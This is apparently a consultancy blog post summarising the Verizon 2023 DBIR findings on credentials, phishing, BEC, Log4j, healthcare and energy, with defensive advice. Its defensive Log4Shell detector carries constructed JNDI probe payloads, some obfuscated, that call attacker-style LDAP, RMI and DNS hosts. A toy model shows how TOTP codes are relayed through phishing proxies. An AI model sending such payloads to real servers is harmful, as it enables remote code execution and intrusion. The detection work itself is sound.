The Verizon 2023 Data Breach Investigations Report (DBIR) has been released and includes many findings that every business should understand to defend against emerging threats. Which findings stand out? And what can critical infrastructure businesses do to be prepared and reduce the impact of data breaches?
The annual Verizon Data Breach Investigations Report is among the most highly regarded reports in the cybersecurity industry. For over fifteen years, Verizon has been sharing its data-driven analysis of the top risks global organizations face. The report’s value lies in its unbiased perspective, extensive global data, and thorough examination of all types of risks, including intentional cyber threats and human and physical errors.
Without any further ado, let’s dive into the 2023 report findings.
Summary of key findings
The human element
Perhaps the most reported finding from last year’s report was that the human element was involved in 82% of security incidents and data breaches. This year, the report indicates that 74% of all breaches involve the human element, demonstrating that people play and will continue to play a vital role in an organization’s security.
This percentage is down by almost ten percentage points compared to 2022, and at least two plausible reasons explain the drop. First, organizations have recognized the importance of the human factor in reducing business risk and have begun to invest in security awareness programs.
Second, threat actors have started to exploit technical vulnerabilities more actively. This year's vulnerability-exploitation category was likely skewed by Log4j (CVE-2021-44228), which was widely exploited: Log4j was identified in 90% of the incidents that involved vulnerability exploitation. It is also noteworthy that 32% of all Log4j scanning activity occurred within 30 days of the vulnerability's release, which shows how little time defenders had to patch before being probed.
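What that scanning activity looks like in a web server log, and how to catch it, is not covered by the report itself. The following is an added example (not code from the report or from ITEGRITI) that normalizes the common Log4Shell obfuscations (URL encoding, `${lower:…}`/`${upper:…}` and `${::-x}` default-value lookups) before testing for a `${jndi:` lookup. The log lines are constructed and the IP addresses are documentation ranges, not real scanners.

```python
"""Detect Log4Shell (CVE-2021-44228) probes in web access logs.

Added example with constructed log lines. The patterns cover the obfuscation
tricks seen in mass scanning: URL encoding, ${lower:j}/${upper:J}, and
${anything:-j} (a lookup with a default value that evaluates to "j").
"""
import re
from urllib.parse import unquote

# Innermost lookups attackers use to hide the literal string "jndi".
_LOWER = re.compile(r"\$\{\s*lower\s*:\s*([^${}]*)\}", re.I)
_UPPER = re.compile(r"\$\{\s*upper\s*:\s*([^${}]*)\}", re.I)
# ${key:-default} with no nested lookups inside evaluates to "default"
# when "key" is unknown (e.g. ${::-j} or ${env:NOPE:-j}).
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Undo URL encoding and resolve nested lookups inside-out until stable."""
    text = unquote(unquote(text))  # handles single and double encoding
    for _ in range(max_rounds):
        before = text
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return bool(_JNDI.search(normalize(line)))


def scan(lines):
    """Return (line_number, source_ip) for every line that looks like a probe.
    Assumes Apache/nginx combined log format with the client IP first."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if is_log4shell_probe(line):
            hits.append((number, line.split(" ", 1)[0]))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:13:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:13:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:13:03:19 +0000] "GET /?x=${${lower:j}ndi:rmi://198.51.100.9/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:13:04:40 +0000] "GET /%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fexfil.example%7D HTTP/1.1" 404 0 "-" "-"',
    '203.0.113.10 - - [10/Dec/2021:13:05:01 +0000] "GET /login HTTP/1.1" 200 900 "-" "${date:yyyy-MM-dd}"',
]

if __name__ == "__main__":
    for number, ip in scan(SAMPLE_LOG):
        print(f"line {number}: Log4Shell probe from {ip}")
```

The lookup regexes deliberately refuse to span nested braces, so resolution is forced inside-out and terminates; a benign `${date:yyyy-MM-dd}` in a User-Agent is not flagged because it contains no `:-` default and no `jndi:` prefix. In production this belongs in the SIEM or WAF rule set rather than a script, and hits should be correlated with outbound LDAP/RMI/DNS connections from the application host, which is the sign that a probe actually succeeded.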
Regarding the human factor in data breaches, it is worth noting that nearly 10% of them are caused by human error. Surprisingly, the majority of these mistakes are not made by regular employees but by technical experts such as IT administrators and software developers. These professionals work in complex technology environments where burnout is commonly reported and leads to more mistakes, and when they do make an error the consequences can be severe, because they handle sensitive data sets and privileged systems.
Phishing and Business Email Compromise
According to the report findings, the top three methods cyber threat actors use to gain access to organizations are stolen or compromised credentials, phishing, and vulnerability exploitation. Interestingly, these have remained the top methods for the past three years. However, it is worth noting that phishing appears to be less prevalent than credential compromise and account takeover.
Despite this, phishing remains one of the main causes of breaches. What is particularly noteworthy is that almost half of the successful phishing incidents were attributed to Business Email Compromise (BEC). Such emails typically contain no malicious links or infected attachments. They are financially motivated schemes that trick individuals into approving invoices, releasing payments, or changing bank account details, with the sole aim of stealing money.
Finally, it is important to mention that external threat actors are responsible for the majority of breaches (83%), while internal threat actors play a smaller role. Furthermore, most of these threat actors are financially motivated, typically stemming from organized crime.
Healthcare
The healthcare industry is a major target for ransomware gangs, leading to severe disruptions and potential harm to patients. In addition, data breaches have increased in the past three years due to ransomware attacks. Such attacks compromise sensitive data and cause chaos as the medical staff is forced to work without their usual systems.
System intrusion, web application attacks, and miscellaneous errors represent 68% of the reported data breaches, and the data compromised was primarily personal (67%) and medical (54%). While system intrusion and web application attacks are attributed to external actors, insiders remain a significant problem, accounting for 35% of healthcare breaches, mostly through error rather than malice.
Although malicious insiders are not among the top three patterns, unintentional errors are widespread and part of the broader human issue. Misdelivery in particular is a significant challenge: data meant for a specific individual or organization is sent to someone else, exposing sensitive patient information to unauthorized parties.
Oil & Gas, Energy, and Water
As in the healthcare sector, system intrusion, web application attacks, and errors are the top three breach patterns, accounting for 81% of breaches. Surprisingly, social engineering and phishing did not make the top three, or even the top five.
As in other sectors, however, ransomware is prevalent, responsible for roughly one-third of breaches, which explains why system intrusion was the number one pattern in 2022. Given the high success rate of ransomware and the fact that attackers routinely exfiltrate unencrypted data and post it on their leak sites, critical infrastructure businesses need to be vigilant and take the necessary precautions.
Actionable tips to take back home
Considering all the above findings, businesses globally, as well as in critical infrastructure like healthcare, oil & gas, energy and water, should focus on the following four action items to minimize the potential of a data breach:
Strong authentication
Since 49% of breaches involve stolen or compromised credentials, strong access controls based on multi-factor authentication (MFA) are the most effective single measure. According to CISA, MFA can block up to 99% of identity-based attacks. MFA prompt bombing (also called MFA fatigue) and adversary-in-the-middle phishing kits that relay one-time codes have shown the limits of push- and code-based MFA, but any MFA is better than no MFA. Critical infrastructure companies are nevertheless advised to follow the direction of recent US government mandates (such as OMB memorandum M-22-09, which requires phishing-resistant MFA for federal agencies) and deploy phishing-resistant MFA such as FIDO/WebAuthn or PKI certificate-based authentication (CBA).
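Why FIDO is "phishing-resistant" while a one-time code is not comes down to origin binding, which the report does not spell out. The following is an added example (not code from the report or from ITEGRITI) that models both flows with the Python standard library: a TOTP code typed into a look-alike site is relayed to the real site and accepted, whereas a WebAuthn-style assertion is refused twice over, first by the browser's RP ID scoping and then by the relying party's origin check. The origins, RP ID and secrets are made up, and an HMAC stands in for the authenticator's public-key signature so the script runs offline.

```python
"""Toy model of OTP relay versus FIDO/WebAuthn origin binding.

Added example with constructed origins and keys. The authenticator's ECDSA
signature is replaced by an HMAC over the same fields so that no third-party
crypto library is needed; the checks the relying party performs are the ones
that matter.
"""
import hashlib
import hmac
import json
import secrets
import struct
from urllib.parse import urlparse

REAL_ORIGIN = "https://bank.example"          # constructed
PHISH_ORIGIN = "https://bank-login.example"   # constructed look-alike proxying to the real site
RP_ID = "bank.example"


# --- TOTP (RFC 6238 on top of RFC 4226 HOTP, SHA-1, 30 s step) ------------
def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp_relay_attack(shared_secret: bytes, now: int) -> bool:
    """Victim types the current code into the phishing page; the proxy submits
    it to the real site within the same 30 s window. The code carries no
    information about where it was typed, so the real site accepts it."""
    typed_on_phish = totp(shared_secret, now)
    return hmac.compare_digest(typed_on_phish, totp(shared_secret, now))


# --- FIDO/WebAuthn-style assertion -----------------------------------------
def browser_allows_rp_id(page_origin: str, rp_id: str) -> bool:
    """A browser only lets a page use credentials whose RP ID equals the page's
    host or a registrable parent of it; a look-alike domain is out of scope."""
    host = urlparse(page_origin).hostname or ""
    return host == rp_id or host.endswith("." + rp_id)


def make_assertion(cred_key: bytes, rp_id: str, page_origin: str, challenge: str):
    """The authenticator signs the RP ID hash plus a hash of clientDataJSON,
    and clientDataJSON records the origin the browser actually saw."""
    client_data = json.dumps(
        {"type": "webauthn.get", "challenge": challenge, "origin": page_origin},
        sort_keys=True).encode()
    auth_data = hashlib.sha256(rp_id.encode()).digest()
    signed = auth_data + hashlib.sha256(client_data).digest()
    sig = hmac.new(cred_key, signed, hashlib.sha256).digest()  # stand-in for ECDSA
    return client_data, auth_data, sig


def rp_verify(cred_key, rp_id, expected_origin, issued_challenge,
              client_data, auth_data, sig) -> bool:
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get" or cd.get("challenge") != issued_challenge:
        return False
    if cd.get("origin") != expected_origin:   # origin binding: defeats relay
        return False
    if auth_data != hashlib.sha256(rp_id.encode()).digest():
        return False
    signed = auth_data + hashlib.sha256(client_data).digest()
    return hmac.compare_digest(hmac.new(cred_key, signed, hashlib.sha256).digest(), sig)


def webauthn_relay_attack(cred_key: bytes):
    """Returns (browser_allowed, rp_accepted). The second value pretends the
    browser check was bypassed, to show the relying-party check on its own."""
    challenge = secrets.token_urlsafe(32)   # issued by the real site, relayed by the proxy
    browser_allowed = browser_allows_rp_id(PHISH_ORIGIN, RP_ID)
    client_data, auth_data, sig = make_assertion(cred_key, RP_ID, PHISH_ORIGIN, challenge)
    rp_accepted = rp_verify(cred_key, RP_ID, REAL_ORIGIN, challenge, client_data, auth_data, sig)
    return browser_allowed, rp_accepted


def webauthn_legit_login(cred_key: bytes) -> bool:
    challenge = secrets.token_urlsafe(32)
    client_data, auth_data, sig = make_assertion(cred_key, RP_ID, REAL_ORIGIN, challenge)
    return rp_verify(cred_key, RP_ID, REAL_ORIGIN, challenge, client_data, auth_data, sig)


if __name__ == "__main__":
    key = secrets.token_bytes(32)
    print("TOTP relayed through phishing proxy accepted:", totp_relay_attack(b"12345678901234567890", 59))
    print("WebAuthn via proxy (browser allows, RP accepts):", webauthn_relay_attack(key))
    print("WebAuthn at the real origin accepted:", webauthn_legit_login(key))
```

The TOTP function reproduces the RFC 6238 test vector (secret `12345678901234567890`, time 59 gives `287082`), so the relay result is not an artefact of a toy implementation: the code is correct and is still stolen. For WebAuthn the attacker never obtains a usable assertion, because the credential is scoped to `bank.example` and even an assertion somehow produced for the phishing origin fails the relying party's origin comparison. Push-based MFA fails in the same way as TOTP here, which is why prompt bombing works against it.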
Phishing awareness training
The second most prevalent entry method is phishing, which exploits people rather than technology. The best way to empower people is to teach them how to recognize and respond to social engineering. Phishing awareness training, including phishing simulations, should promote a positive security culture rather than punish mistakes. Businesses should measure the outcome of these activities, tracking both the click rate and the report rate, since a rising report rate is the clearer sign that staff have become a detection layer.
Patch management
The third way attackers penetrate an organization is by exploiting vulnerabilities. Known vulnerabilities must be patched as soon as possible to close the door on attackers, prioritizing those known to be exploited in the wild (for example, those listed in CISA's Known Exploited Vulnerabilities catalog). For critical systems that cannot be patched at release time, businesses should deploy compensating measures to contain the impact of a breach, such as endpoint detection and response (EDR), network segmentation, and tested incident response procedures.
Business policies for financial transactions
Business policies for financial transactions are the primary defense against BEC. BEC emails are particularly hard to detect with automated security tools or by people, because they are customized to the target and carry few technical indicators, and recent advances in generative AI let attackers produce convincing personalized emails in any language. Employees must therefore follow the established procedures for approving invoices, transferring money, or modifying payment details, such as verifying any change of bank details by calling a known number rather than replying to the email, and requiring a second approver for large or unusual payments.
ITEGRITI has deep experience across critical infrastructure cybersecurity programs, compliance, risk, and audit. Contact us today to learn how we can leverage this experience to help you accomplish your cybersecurity goals.
Contact Us: https://itegriti.com/contact/
ITEGRITI Services: https://itegriti.com